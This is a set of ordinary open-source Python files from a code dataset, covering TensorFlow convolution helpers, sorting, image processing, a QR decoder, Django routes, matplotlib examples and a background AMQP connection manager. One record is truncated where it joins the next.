conv2(input_images,filter_size,stride,out_filters,div_p=2,padding='SAME',weight=None,activate=tf.nn.relu):\n #将权重分模块做卷积,2 2分\n in_filters=input_images.get_shape().as_list()[-1]\n #卷积核初始化\n\n part_results=[]\n num_part=div_p*div_p\n shape_input=input_images.get_shape().as_list()\n part_even_w=shape_input[1]//2+filter_size-1\n part_even_h=shape_input[2]//2+filter_size-1\n part_odd_w=shape_input[1]//2\n part_odd_h=shape_input[2]//2\n region_list=[\n [0,part_even_w,0,part_even_h],\n [part_odd_w,shape_input[1],0,part_even_h],\n [0,part_even_w,part_odd_h,shape_input[2]],\n [part_odd_w,shape_input[1],part_odd_h,shape_input[2]]\n ]\n # print(region_list)\n for i in range(num_part):\n # print(i)\n biase = tf.Variable(tf.constant(0.0, shape=[out_filters]), 
dtype=tf.float32, name='biases'+str(i))\n if weight:\n _weights=weight\n else:\n _weights=tf.Variable(tf.contrib.layers.xavier_initializer(uniform=False)\n ([filter_size,filter_size,in_filters,out_filters])\n ,name = 'weight1'+str(i))\n\n\n part_input = input_images[:, region_list[i][0]:region_list[i][1], region_list[i][2]:region_list[i][3], :]\n # print(part_input.get_shape().as_list())\n r_conv = tf.nn.conv2d(part_input, _weights, strides=stride, padding=padding)\n r_biases = tf.add(r_conv, biase)\n r_act = activate(r_biases)\n # print('result',r_act.get_shape().as_list())\n part_results.append(r_act)\n _01_result=tf.concat((part_results[0],part_results[1]),axis=1)\n _23_result=tf.concat((part_results[2],part_results[3]),axis=1)\n _result=tf.concat((_01_result,_23_result),axis=2)\n # print('01',_01_result.get_shape().as_list(),'\\n',\n # '23',_23_result.get_shape().as_list(),'\\n',\n # 'result',_result.get_shape().as_list())\n relu_result=tf.nn.relu(_result,name='relu')\n return relu_result\n\n\ndef down_sampling(x,ksize=2,strides=2,padding='VALID'):\n\n #down-sampling\n #ksize: A 1-D int Tensor of 4 elements.\n #strides: A 1-D int Tensor of 4 elements\n return tf.nn.max_pool(x,[1,ksize,ksize,1],[1,strides,strides,1],padding=padding,name='max_pool')\n\n\ndef full_connect(inp,out_filters):\n #input, filter, strides, padding, use_cudnn_on_gpu=True, data_format=\"NHWC\", name=None\n kernel_w=inp.get_shape().as_list()[1]\n kernel_h=inp.get_shape().as_list()[2]\n\n _weights = tf.Variable(tf.contrib.layers.xavier_initializer(uniform=False)\n ([kernel_w, kernel_h, inp.get_shape().as_list()[-1], out_filters])\n , name='weight1')\n conv=tf.nn.conv2d(inp,_weights,[1,1,1,1],padding='VALID')\n biases = tf.Variable(tf.constant(0.0, shape=[out_filters], dtype=tf.float32), name='biases')\n re_conv2 = tf.add(conv, biases)\n #sum_conv=tf.reduce_sum(conv,[0,1,2])\n return re_conv2\n\ndef orid_conv2(inp,filter_size,out_filters,strides,padding='VALID'):\n #ordinary (plain) convolution\n weights=tf.Variable(tf.contrib.layers.xavier_initializer(uniform=False)(\n [filter_size,filter_size,inp.get_shape().as_list()[-1],out_filters]\n ),name='weights')\n biases=tf.Variable(tf.constant(0.0,shape=[out_filters],dtype=tf.float32),name='biases')\n conv=tf.nn.conv2d(inp,weights,[1,strides,strides,1],padding)\n re_conv2=tf.add(conv,biases)\n relu_result=tf.nn.relu(re_conv2,name='relu')\n return relu_result\n\n\ndef local_share_weight_conv2(input_images,filter_size,stride,out_filters,div_w=2,div_h=2,padding='VALID',weight=None,activate=tf.nn.relu):\n #convolve with the weights split into blocks\n in_filters=input_images.get_shape().as_list()[-1]\n #initialize the convolution kernels\n\n part_results=[]\n num_part=div_w*div_h\n shape_input=input_images.get_shape().as_list()\n #compute the width and height of each part\n w_part_middle=shape_input[1]//div_w+filter_size-1\n h_part_middle=shape_input[2]//div_h+filter_size-1\n norm_part_width=shape_input[1]//div_w\n norm_part_height=shape_input[2]//div_h\n region_list=[]\n\n begin_w = 0\n begin_h = 0\n\n for part in range(num_part):\n change_line=False\n\n if (part+1)%div_w==0:\n part_width=shape_input[1]\n change_line=True\n else:\n part_width=w_part_middle+begin_w\n if num_part-(part+1) 1:\n sorted_sequence = []\n\n left_half = MergeSort.merge_sort(sequence[:len(sequence) // 2])\n right_half = MergeSort.merge_sort(sequence[len(sequence) // 2:])\n\n left_index = 0\n right_index = 0\n\n while len(sequence) != len(sorted_sequence):\n if len(left_half) > left_index and len(right_half) > right_index:\n if left_half[left_index] <= right_half[right_index]:\n 
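# using '<=' keeps the merge stable: on ties the element from the left half is taken first\n 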
sorted_sequence.append(left_half[left_index])\n left_index += 1\n else:\n sorted_sequence.append(right_half[right_index])\n right_index += 1\n elif len(left_half) == left_index:\n sorted_sequence.append(right_half[right_index])\n right_index += 1\n else:\n sorted_sequence.append(left_half[left_index])\n left_index += 1\n\n return sorted_sequence\n\n else:\n return sequence\n\na = [8, 10, 3, 7, 13, 2, 42, 6, 0, 6, -9]\n\nprint(MergeSort.merge_sort(a))\n","repo_name":"AnetaStoycheva/Algorithms_HackBulgaria","sub_path":"week1/5-Sorting/merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":1236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"39444377776","text":"import pandas as pd\nimport matplotlib.pyplot as plt\nimport os\n\nfrom deepcardio_utils import ImageReader, get_mask, plot_cell\n\nif __name__=='__main__':\n imageReader = ImageReader()\n images = imageReader.get_full_images()\n confsDF, detSparksDF = imageReader.get_spark_simple_data()\n\n plotsFolderPath = os.path.join(imageReader.get_image_folder(), imageReader.get_image_id() + '_xyt_size')\n if not os.path.exists(plotsFolderPath):\n os.makedirs(plotsFolderPath)\n\n xytList = []\n for sparkIdx in range(int(confsDF.loc[0, 'Surviving sparks'])):\n frameIni = int(detSparksDF.loc[sparkIdx, :].tolist()[3]) - 25\n frameFin = int(detSparksDF.loc[sparkIdx, :].tolist()[3]) + 25\n sparkX = int(detSparksDF.loc[sparkIdx, 'Xpix'])\n sparkY = int(detSparksDF.loc[sparkIdx, 'Ypix'])\n maskSize = detSparksDF.loc[sparkIdx, 'FWHM'] / float(confsDF.loc[:, 'Pixel size(um)'])\n mask = get_mask(images.shape[1], images.shape[2], sparkX, sparkY, maskSize)\n\n res = []\n for i in range(frameIni, frameFin + 1):\n res.append(images[i][:, :, 2][mask].mean())\n\n avgS = pd.Series(res)\n rollS = avgS.rolling(3, center=True).mean()\n sparkFrameIdx = rollS.idxmax() + frameIni\n\n plt.plot(avgS)\n plt.plot(rollS)\n plt.scatter(rollS.idxmax(), rollS.max(), c='red')\n plt.title(f\"Spark idx {sparkIdx} on frame {sparkFrameIdx}\")\n plt.savefig(os.path.join(plotsFolderPath, f\"{sparkIdx}.png\"))\n plt.close()\n\n tIni = max(sparkFrameIdx-1, frameIni)\n tFin = min(sparkFrameIdx+1, frameFin)\n xytList.append((sparkX, sparkY, tIni, tFin, maskSize))\n\n xytDF = pd.DataFrame(xytList, columns=['x', 'y', 'tIni', 'tFin', 'pixelSize'])\n storePath = plotsFolderPath + '.csv'\n xytDF.to_csv(storePath, index=False)","repo_name":"raulbenitez/DEEPCARDIO","sub_path":"sparks/train/generate_xyt_on_sparksimple_data.py","file_name":"generate_xyt_on_sparksimple_data.py","file_ext":"py","file_size_in_byte":1837,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"6863054649","text":"import cv2\n# read the input image\nimage = cv2.imread(\"vk_qr.png\")\n# initialize the cv2 QRCode detector\ndetector = cv2.QRCodeDetector()\n# detect the qr code and decode it\ndata, p_array, b_qrcode = detector.detectAndDecode(image)\n# if there is a QR code print the data\nif p_array is not None:\n print(\"Encoded:\", data)\nelse:\n print(\"There doesn't seem to be a QR code here\")\n","repo_name":"balderfreir/python-pet-small-projects","sub_path":"qrcodedecoder.py","file_name":"qrcodedecoder.py","file_ext":"py","file_size_in_byte":449,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"19512362640","text":"import random\nimport numpy as np\nfrom scipy import interpolate\nfrom torch import distributions, nn\nimport 
torch.nn.functional as f\nimport torch\nfrom torch.utils.data import Dataset\n\nfrom config import *\n\n\nclass ImageSet(Dataset):\n def __init__(self, input, result, boundaries):\n self.input = input\n self.result = result\n self.boundaries = boundaries\n\n def __getitem__(self, item):\n return self.input[item], self.result[item], self.boundaries[item]\n\n def __len__(self):\n return len(self.input)\n\n\nclass Network(torch.nn.Module):\n def __init__(self):\n super(Network, self).__init__()\n self.conv1 = nn.Conv2d(3, 30, kernel_size=5)\n self.bn_conv1 = nn.BatchNorm2d(30)\n self.conv2 = nn.Conv2d(30, 60, kernel_size=5)\n self.bn_conv2 = nn.BatchNorm2d(60)\n self.linear1 = nn.Linear(320 * 3, 1256)\n self.linear2 = nn.Linear(1256, k + k * n + n * l * k + k * n)\n\n def forward(self, x: torch.Tensor):\n x = f.relu(f.max_pool2d(self.bn_conv1(self.conv1(x)), kernel_size=2))\n x = f.relu(f.max_pool2d(self.bn_conv2(self.conv2(x)), kernel_size=2))\n x = x.view(-1, 320 * 3)\n x = f.relu(self.linear1(x))\n x = self.linear2(x)\n x = torch.cat([torch.softmax(x[:, :k], dim=1), x[:, k:]], 1)\n return x\n\n\ndef prepare_input(image):\n image_mod = image.copy()\n x = np.zeros((image_x * image_y,))\n y = np.zeros((image_x * image_y,))\n z = np.zeros((image_x * image_y,))\n counter = 0\n for i, row in enumerate(image_mod):\n for j, a in enumerate(row):\n x[counter] = j\n y[counter] = i\n z[counter] = a\n counter += 1\n img_center_x = image_x / 2\n img_center_y = image_y / 2\n dx = random.randint(-max_random, max_random)\n dy = random.randint(-max_random, max_random)\n hole_beg_x = img_center_x - hole_size_x / 2 + dx\n hole_end_x = img_center_x + hole_size_x / 2 + dx\n hole_beg_y = img_center_y - hole_size_y / 2 + dy\n hole_end_y = img_center_y + hole_size_y / 2 + dy\n mask = []\n\n # remove center rectangle\n for a in range(image_x * image_y):\n if not hole_beg_x < x[a] < hole_end_x or not hole_beg_y < y[a] < hole_end_y:\n mask.append(a)\n x = x[mask]\n y = y[mask]\n z = z[mask]\n # move points to fill hole\n x_old = np.copy(x)\n y_old = np.copy(y)\n b1 = hole_end_y - hole_end_x\n b2 = hole_end_y + hole_beg_x\n for a in range(len(x)):\n if hole_beg_x <= x[a] <= hole_end_x or hole_beg_y <= y[a] <= hole_end_y:\n if x[a] + b1 > y[a] and -x[a] + b2 > y[a]:\n d = (hole_end_y + hole_beg_y) / (2 * hole_beg_y)\n c = (2 - 2 * d) / hole_size_x\n y[a] *= c * abs(x[a] - (hole_beg_x + hole_end_x) / 2) + d\n elif x[a] + b1 < y[a] and -x[a] + b2 < y[a]:\n d = (hole_end_x + hole_beg_x) / (2 * hole_beg_x)\n c = (2 - 2 * d) / hole_size_y\n x[a] *= c * abs(y[a] - (hole_beg_y + hole_end_y) / 2) + d\n elif x[a] + b1 > y[a] > -x[a] + b2:\n d = (hole_end_y + hole_beg_y) / (2 * hole_beg_y)\n c = (2 - 2 * d) / hole_size_x\n y[a] = image_y - (image_y - y[a]) * c * abs(x[a] - (hole_beg_x + hole_end_x) / 2) + d\n\n elif x[a] + b1 < y[a] < -x[a] + b2:\n d = (hole_end_x + hole_beg_x) / (2 * hole_beg_x)\n c = (2 - 2 * d) / hole_size_y\n x[a] = image_x - (image_x - x[a]) * c * abs(y[a] - (hole_beg_y + hole_end_y) / 2) + d\n\n x_2 = np.arange(0, 28, 1)\n y_2 = np.arange(0, 28, 1)\n x_2, y_2 = np.meshgrid(x_2, y_2)\n z_new = interpolate.griddata((x, y), z, (x_2, y_2), method='linear')\n x_new = interpolate.griddata((x, y), x_old, (x_2, y_2), method='linear')\n y_new = interpolate.griddata((x, y), y_old, (x_2, y_2), method='linear')\n return np.stack([z_new, x_new, y_new]), ((hole_beg_x, hole_end_x), (hole_beg_y, hole_end_y))\n\n\ndef loss_function(x: torch.Tensor, orig, boundaries, k, l, n):\n hole_beg_x = boundaries[0][0].int()\n hole_end_x = 
boundaries[0][1].int()\n hole_beg_y = boundaries[1][0].int()\n hole_end_y = boundaries[1][1].int()\n x = x.view((len(x), -1))\n sum = torch.tensor(0).double().to(device)\n p: torch.Tensor = x[:, :k].reshape(-1, k)\n m: torch.Tensor = x[:, k:k + k * n].reshape(-1, k, n)\n A: torch.Tensor = x[:, k + k * n:k + k * n + n * l * k].reshape(-1, k, n, l)\n d: torch.Tensor = x[:, k + k * n + n * l * k:].reshape(-1, k, n)\n dist = distributions.lowrank_multivariate_normal.LowRankMultivariateNormal(m, A, torch.abs(d))\n layers = torch.stack([orig[i, hole_beg_x[i]:hole_end_x[i], hole_beg_y[i]:hole_end_y[i]] for i in range(len(x))])\n sum = sum - (p.log() + dist.log_prob(layers.reshape(len(layers), 1, -1))).sum()\n return sum\n","repo_name":"Kanciarzek/PictureImpainting","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"1463388142","text":"from django.urls import path\nfrom .views import (\n # manage\n manage_list,\n\n # page\n page_list,\n page_create,\n page_update,\n page_delete,\n\n # carousel\n carousel_form,\n carousel_list,\n carousel_update,\n)\n\n\nurlpatterns = [\n path('carousel/list/', carousel_list, name='carousel_list'),\n path('carousel/form/', carousel_form, name='carousel_form'),\n path('carousel/update//', carousel_update, name='carousel_update'),\n\n path('', manage_list, name='manage_list'), #manage/\n\n path('page/list/', page_list, name='page_list'), #page/\n path('page/create/', page_create, name='page_create'), #page/\n path('page/update//', page_update, name='page_update'), #page/\n path('page/delete//', page_delete, name='page_delete'), #page/\n]\n","repo_name":"guvenaltunsoyy/django-kaft-clone","sub_path":"page/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":799,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"11201303732","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n\nclass VisualInduction(object):\n def __init__(self):\n # self.color_argument()\n pass\n\n def single_figure(self):\n # create the figure (canvas)\n fig = plt.figure()\n\n # create an Axes object at position 1 of a 1x1 grid on the figure, ready for drawing\n # an Axes can also be created via fig.add_subplot(2, 2, 1)\n ax = fig.add_subplot(111)\n\n # xlim is the x-axis range, xlabel the x-axis label\n # ylim is the y-axis range, ylabel the y-axis label\n ax.set(xlim=[0.5, 4.5], ylim=[-2, 8], title='An Example Axes',\n ylabel='Y-Axis', xlabel='X-Axis')\n pass\n\n def more_figure(self):\n fig, axes = plt.subplots(nrows=2, ncols=2)\n ax1 = axes[0, 0]\n ax2 = axes[0, 1]\n ax3 = axes[1, 0]\n ax4 = axes[1, 1]\n\n x = np.linspace(0, np.pi)\n y_sin = np.sin(x)\n y_cos = np.cos(x)\n\n # the first two arguments are the x-axis and y-axis data.\n # ax2's third argument is a MATLAB-style format string; for ax3 the color is set explicitly, and marker is the point style.\n ax1.plot(x, y_sin)\n ax2.plot(x, y_sin, 'go--', linewidth=2, markersize=12)\n ax3.plot(x, y_cos, color='red', marker='+', linestyle='dashed')\n\n ax1.set(xlim=[0.5, 4.5], ylim=[-2, 8], title='Upper Left', ylabel='Y-Axis', xlabel='X-Axis')\n\n ax2.set(xlim=[0.5, 4.5], title='Upper Right', ylabel='Y-Axis', xlabel='X-Axis')\n\n ax3.set(ylim=[-2, 8], title='Lower Left', ylabel='Y-Axis', xlabel='X-Axis')\n\n ax4.set(xlim=[0.5, 4.5], ylim=[-2, 8], title='Lower Right', )\n\n def color_argument(self):\n x = np.linspace(0, 20, 200)\n data_obj = {'x': x,\n 'y1': 2 * x + 1,\n 'y2': 3 * x + 1.2,\n 'mean': 0.5 * x * np.cos(2 * x) + 2.5 * x + 1.1}\n print(x)\n fig, ax = plt.subplots()\n\n # fill the area between two lines: the first argument is the x data, the second and third give the fill range\n ax.fill_between('x', 'y1', 'y2', color='yellow', 
data=data_obj)\n\n # set the line color: the first two arguments are the x-axis and y-axis data\n ax.plot('x', 'mean', color='black', data=data_obj)\n\n def draw_some(self):\n x = np.arange(10)\n print(x)\n y = np.random.randn(10)\n print(y)\n plt.scatter(x, y, color='red', marker='+')\n\n def draw_bar(self):\n \"\"\"Bar charts come in two kinds: horizontal and vertical\"\"\"\n np.random.seed(1)\n x = np.arange(5)\n y = np.random.randn(5)\n\n fig, axes = plt.subplots(ncols=2, figsize=plt.figaspect(1. / 2))\n\n # color of the bars and the bar style\n vert_bars = axes[0].bar(x, y, color='lightblue', align='center')\n horiz_bars = axes[1].barh(x, y, color='yellow', align='edge')\n\n # draw a horizontal or vertical line; linewidth is the line width, color its color\n axes[0].axhline(0, color='gray', linewidth=2)\n axes[1].axvline(0, color='gray', linewidth=6)\n\n fig1, ax1 = plt.subplots()\n vert_bars = ax1.bar(x, y, color='lightblue', align='center')\n\n # We could have also done this with two separate calls to `ax.bar` and numpy boolean indexing.\n for bar, height in zip(vert_bars, y):\n if height < 0:\n bar.set(edgecolor='darkred', color='salmon', linewidth=3)\n\n def draw_histogram(self):\n np.random.seed(19680801)\n\n n_bins = 10\n x = np.random.randn(1000, 3)\n\n fig, axes = plt.subplots(nrows=2, ncols=2)\n ax0, ax1, ax2, ax3 = axes.flatten()\n\n colors = ['red', 'tan', 'lime']\n ax0.hist(x, n_bins, density=True, histtype='bar', color=colors, label=colors)\n # legend explaining the colors\n ax0.legend(prop={'size': 10})\n ax0.set_title('bars with legend')\n\n ax1.hist(x, n_bins, density=True, histtype='barstacked')\n ax1.set_title('stacked bar')\n\n ax2.hist(x, histtype='barstacked', rwidth=0.9)\n\n ax3.hist(x[:, 0], rwidth=0.9)\n ax3.set_title('different sample sizes')\n\n fig.tight_layout()\n\n def show_visual(self):\n # show the figure\n plt.show()\n\n\nif __name__ == '__main__':\n visual = VisualInduction()\n visual.draw_histogram()\n visual.show_visual()\n","repo_name":"namexiaohuihui/operating","sub_path":"tools/Visualization/visual_induction.py","file_name":"visual_induction.py","file_ext":"py","file_size_in_byte":4329,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"17336131186","text":"\"\"\"A managed AMQP 0.9.1 connection that can safely consume and produce messages asynchronously.\n\nThis is a tricky thing to do safely and also with the potential for high\nperformance, especially in connections with moderate tcp latency such as\nhaving a consumer or producer running on a different machine than the rabbitmq\nbroker.\n\nThe BackgroundAMQPConnection class is designed to be both safe and performant,\nwith a simple API that allows building worker processes that need to\nconsume messages at high speed and then republish them somewhere else with\nat-least-once semantics in the face of any kind of error.\n\n\nConcurrency Design\n------------------\n\nThe basic design of the class has a single background thread that synchronizes\nall activity on the AMQP connection. Actions are performed by calling methods\non the class instance that queue the action for the background thread and then\neither return immediately (for high performance actions like publishing) or\nblock until the action has been completed (for infrequent actions like registering\na queue). 
All actions can be queued from any thread without coordination since they\nare synchronized through a single background thread::\n\n BackgroundAMQPConnection\n\n primary thread(s) background_thread\n\n bind_temporary_queue (SYNC)\n - _BindQueue action queued\n - blocked on shared future\n - bind action pulled from queue\n and performed\n - result set in future object\n - future unblocked and returns\n\n\n publish_message (ASYNC)\n - _PublishMessage action queued\n - returns immediately\n\n - publish action pulled from queue\n - message published\n\n [if with_confirm is set]\n - confirmation pulled from connection\n - DeliveryConfirmation object added to\n output messages queue\n\n\nBackgroundAMQPConnection can be used in one of two ways:\n - Queuing: All events are automatically queued in a single queue for polling()\n - Callbacks: All events are immediately dispatched to a single callback\n\n\nQueueing\n--------\n\nGenerally speaking, queuing is easier for simple use cases where a single\napplication is directly managing the connection:\n\nThere is a single centralized `messages`` queue that contains any events that\nthe user's code may need to react to (including the connection being\nterminated). This allows the user to design their application as a loop that\nperforms a blocking ``get()`` on this queue as the main driver of all action.\n\nBased on the event, the user's code can then react to either:\n - a new message being received from a consumer\n - a delivery confirmation being received from a published message\n - the connection being terminated\n\n\nCallbacks\n---------\n\nCallbacks are an advanced use case where you want to distinguish between\nevents as they happen and perhaps route them to different queues for multiple\nsubsystems of your application. In this case, the ``messages`` queue will\nnever be filled and you need to pass a callback into the connection\nconstructor. This callback will be called from the background thread whenever\nan event happens and it **must not block or take an action directly on the\nconnection** and instead deal with the event in whatever way it wants such\nas queuing to an appropriate queue based on what kind of event it is.\n\n\nImplementation Notes\n--------------------\n\n1. The original implementation of this class included multiple channels so\n that a single connection could be used for both consuming and publishing on\n a separate channel on the same connection. However, it seems that py-amqp\n is not stable in that configuration. 
It would have race conditions and\n framing errors even though it was only being used on a single thread.\n Resolving this led to separating publish and consume operations on separate\n connections as is recommended by rabbitmq as a best practice.\n\"\"\"\n\nfrom typing import Optional, Union, Callable, List, Generator\nfrom threading import Thread\nimport logging\nimport socket\nimport time\nfrom collections import OrderedDict\nfrom dataclasses import dataclass\nfrom concurrent.futures import Future\nfrom queue import SimpleQueue, Empty\nimport amqp\nfrom .telegraf import MonitoringMetric\n\n\n@dataclass\nclass _AcknowledgeMessage:\n \"\"\"Internal action object to represent a basic_ack call.\"\"\"\n\n __slots__ = ['delivery_tag', 'multiple']\n\n delivery_tag: int\n multiple: bool\n\n\n@dataclass\nclass _StartConsuming:\n \"\"\"Internal action object to represent a basic_consume call.\"\"\"\n\n __slots__ = ['queue', 'tag']\n\n queue: str\n tag: Optional[str]\n\n\n@dataclass\nclass _BindQueue:\n \"\"\"Internal action object to represent a register_queue then bind_queue call.\"\"\"\n\n __slots__ = ['queue', 'binding_key', 'exchange']\n\n queue: str\n binding_key: Union[str, List[str]] # Support multiple binding keys\n exchange: str\n\n\n@dataclass\nclass _PublishMessage:\n \"\"\"Internal action object to represent a request to publish a message.\"\"\"\n\n __slots__ = ['message', 'exchange', 'routing_key', 'with_confirm', 'context']\n\n message: amqp.Message\n exchange: str\n routing_key: str\n with_confirm: bool\n context: Optional[object]\n\n\n@dataclass\nclass DeliveryConfirmation:\n \"\"\"Object put into output queue indicating that a published message was confirmed or nacked.\n\n The ``message_contexts`` array will contain one entry for every message\n that is being acknowledged. The value will be whatever context object was\n passed during the call to ``publish_message``. Users should put an object\n into ``context`` that gives them whatever information they need when the\n delivery confirmation comes.\n \"\"\"\n\n __slots__ = ['message_contexts', 'failed']\n\n message_contexts: list\n failed: bool\n\n\n# Turn off nuisance log messages every second at debug level saying we responded to a heartbeat\nlogging.getLogger('amqp.connection.Connection.heartbeat_tick').setLevel(logging.INFO)\n\n\nclass BackgroundAMQPConnection:\n \"\"\"A background AMQP connection designed for high performance producer/consumer applications.\n\n This class should be considered experimental and not yet ready for\n production use but is designed to test out high speed amqp consumers that\n have many messages in flight at the same time.\n \"\"\"\n\n POLL_TIMEOUT = 0.1\n \"\"\"Socket read timeout to check for locally queued actions if there is no network traffic.\n\n 100ms (0.1 seconds) is a good default value that balances responsiveness\n to local commands while not increasing CPU usage excessively just to\n wakeup and check for local actions.\n \"\"\"\n\n CONNECT_TIMEOUT = 5\n \"\"\"Maximum time (in seconds) to wait for a new connection to be opened in start().\"\"\"\n\n MAX_PUBLISH_BACKLOG = 1000\n \"\"\"Default maximum queue size before actions like publish() start to be throttled.\n\n Normally publish_message queues the message to publish and returns\n immediately. However, in certain use cases, this can cause the action\n queue to grow without bound. There is a default size limit of 1000\n imposed. 
When the queue is at capacity, future actions will be throttled\n and enter a check_size/wait backoff loop before queuing.\n\n This behavior is necessary to allow the use of SimpleQueue() which is an optimized\n C-implemented queue in the python 3.7+ standard library.\n \"\"\"\n\n _IGNORE_CONFIRM = object()\n \"\"\"Internal sentinel value to indicate messages that we do not wish to confirm.\n\n The entire publish channel is set using confirm_select(), so choosing not to\n confirm a given message just means that when its confirmation is received, it\n will not result in a ``DeliveryConfirmation`` object.\n \"\"\"\n\n def __init__(self, host: str, port: int = 5672, username: Optional[str] = None,\n password: Optional[str] = None, *,\n heartbeat: int = 10, max_messages: int = 100, callback: Optional[Callable] = None,\n max_backlog: int = MAX_PUBLISH_BACKLOG):\n self._host = host\n self._port = port\n self._username = username\n self._password = password\n self._heartbeat = heartbeat\n self._max_messages = max_messages\n\n self._next_message_tag = 1\n\n self._thread = None\n self._logger = logging.getLogger(__name__)\n self.messages: SimpleQueue[amqp.Message] = SimpleQueue()\n self._actions: SimpleQueue[amqp.Message] = SimpleQueue()\n self._unconfirmed_publish = OrderedDict()\n self._max_action_backlog = max_backlog\n\n if callback is None:\n callback = self._queue_message_threaded\n\n self._event_callback = callback\n\n def start(self):\n \"\"\"Connect to the amqp 0.9.1 server and configure for use.\n\n This is a synchronous method that will block until the connection is\n established. It uses a background thread to synchronize all activity\n on the connection.\n \"\"\"\n\n future = Future()\n\n self._thread = Thread(target=self._manage_connection_threaded, args=(future,))\n self._thread.start()\n\n # Block, either raises the exception from management thread or waits until we're connected\n try:\n future.result()\n except:\n self._thread.join()\n self._thread = None\n raise\n\n def stop(self):\n \"\"\"Stop the connection and any consumers.\n\n This method will block until the background thread is shutdown.\n \"\"\"\n\n if self._thread is None:\n self._logger.error(\"Stop called with no active thread\")\n return\n\n self._actions.put(None)\n self._thread.join()\n self._thread = None\n\n def bind_temporary_queue(self, queue_name: str, binding_key: Union[str, List[str]], exchange: str = \"amq.topic\"):\n \"\"\"Create a transient exclusive queue for temporary consumption.\n\n This will do two things:\n - it will declare a queue with the given name, set as exclusive so that it dies when this connection\n is stopped\n - it will bind that queue to the given exchange with a binding key.\n\n Both actions will have been completed by the time this method returns.\n\n Args:\n queue_name: Name of the queue to create\n binding_key: Binding key to attach the created queue to an exchange\n exchange: Name of the exchange to bind the queue to\n \"\"\"\n\n action = _BindQueue(queue_name, binding_key, exchange)\n self._perform_action(action, block=True)\n\n def start_consuming(self, queue_name: str, tag: Optional[str] = None) -> str:\n \"\"\"Start consuming from the named queue, which should already exist on the server.\n\n The consumer is always started without automatic acknowledgement,\n which means that you must acknowledge the messages via a call to\n ``acknowledge_message(message_or_delivery_tag)``.\n\n Args:\n queue_name: The name of the queue to consume from\n tag: Optional tag to name this consumer. 
Autogenerated if not passed.\n\n Returns:\n The tag of the consumer that was started.\n \"\"\"\n\n action = _StartConsuming(queue_name, tag)\n return self._perform_action(action, block=True)\n\n def stop_consuming(self, tag: str): #pylint:disable=no-self-use;This is a placeholder method.\n \"\"\"Stop a previously started consumer.\"\"\"\n\n raise RuntimeError(\"Stop consuming is not yet implemented\")\n\n def iter_events(self, check_interval=0.1) -> Generator[Union[amqp.Message, DeliveryConfirmation, None], None, None]:\n \"\"\"Iterate forever over events, waiting for the next one.\n\n This method uses an internal timeout to block until a message is available\n while still allowing a Ctrl-C event to abort the wait.\n\n Returns:\n The next message received.\n \"\"\"\n\n while True:\n try:\n yield self.messages.get(timeout=check_interval)\n except Empty:\n pass\n\n def acknowledge_message(self, message_or_delivery_tag: Union[amqp.Message, int], multiple: bool = False):\n \"\"\"Acknowledge a message delivered to a consumer on this connection.\n\n This will queue the background thread to send a ``basic_ack`` message\n indicating that the message should be removed from the queue.\n\n Robustness Note:\n ``basic_ack`` is an asynchronous message that has no response from\n the server so there is not a way to write your application to\n block until the server acknowledges the ack. You need to assume\n that your application semantics are at-least-once delivery of each\n message and this is your best-effort way of notifying the server\n that you have successfully processed the message but if you get\n unlucky, it may not get to the server, which means the connection\n is dead and you may get the message again on a future connection\n\n Args:\n message_or_delivery_tag: The consumed message to acknowledge or its delivery tag.\n multiple: Acknowledge all outstanding messages up to and including this one.\n \"\"\"\n\n if isinstance(message_or_delivery_tag, amqp.Message):\n delivery_tag = message_or_delivery_tag.delivery_tag\n else:\n delivery_tag = message_or_delivery_tag\n\n if delivery_tag is None:\n self._logger.debug(\"Ignoring acknowledgement for out-of-band message\")\n return\n\n if not isinstance(delivery_tag, int):\n raise ValueError(\"Unknown delivery tag that was not an integer: %s\" % delivery_tag)\n\n action = _AcknowledgeMessage(delivery_tag, multiple)\n self._logger.log(5, \"Queuing ack for message %s, multiple=%s\", delivery_tag, multiple)\n self._perform_action(action, block=False)\n\n def publish_message(self, exchange: str, routing_key: str, message: amqp.Message,\n *, context: Optional[object] = None, with_confirm: bool = False):\n \"\"\"Queue a message for publishing.\n\n If ``with_confirm = True``, then the message will be sent with delivery confirmation\n and a DeliveryConfirmation object will be put into the ``messages`` queue when the\n message has been confirmed by the broker. Otherwise, no confirmation will be returned.\n\n If a confirmation is returned, it will contain an ``integer`` delivery tag to identify\n which message is being confirmed. The ``delivery_tag`` corresponding to this message\n will be returned by this method.\n\n .. note:\n\n The internal delivery tag for the published message is never exposed directly to\n the user of this method. 
You can instead pass whatever context object you want\n that will be included in the returned ``DeliveryConfirmation`` and that context\n needs to contain whatever information your application needs in order to correctly\n process the confirmation.\n\n Args:\n exchange: The exchange to receive the message\n routing_key: The routing key to publish the message on\n context: An arbitrary object that will be included in the delivery\n confirmation for this message, if with_confirm is True.\n message: The message that should be published.\n with_confirm: Whether we should listen for a delivery confirmation from this message.\n \"\"\"\n\n action = _PublishMessage(message, exchange, routing_key,\n with_confirm=with_confirm, context=context)\n self._logger.log(5, \"Queueing publish with context %s\", context)\n self._perform_action(action, block=False)\n\n def publish_metric(self, worker_id: str, metric: MonitoringMetric):\n \"\"\"Convenience function to automatically publish a metric.\n\n This method does not reset the metric, it just serializes it and\n publishes it over AMQP without confirmation.\n\n Args:\n worker_id: The id of the worker sending this metric so that we generate the\n correct routing key.\n metric: The metric that should be serialized and reported.\n \"\"\"\n\n self.publish_message('amq.topic', metric.routing_key(worker_id), metric.serialize_amqp(),\n with_confirm=False)\n\n def _perform_action(self, action, block=False, timeout=5.0):\n future = None\n if block:\n future = Future()\n\n start_time = time.monotonic()\n while self._actions.qsize() > self._max_action_backlog:\n time.sleep(0.1)\n if time.monotonic() - start_time > timeout:\n raise RuntimeError(\"Could not queue action in specified timeout, queue too large\")\n\n 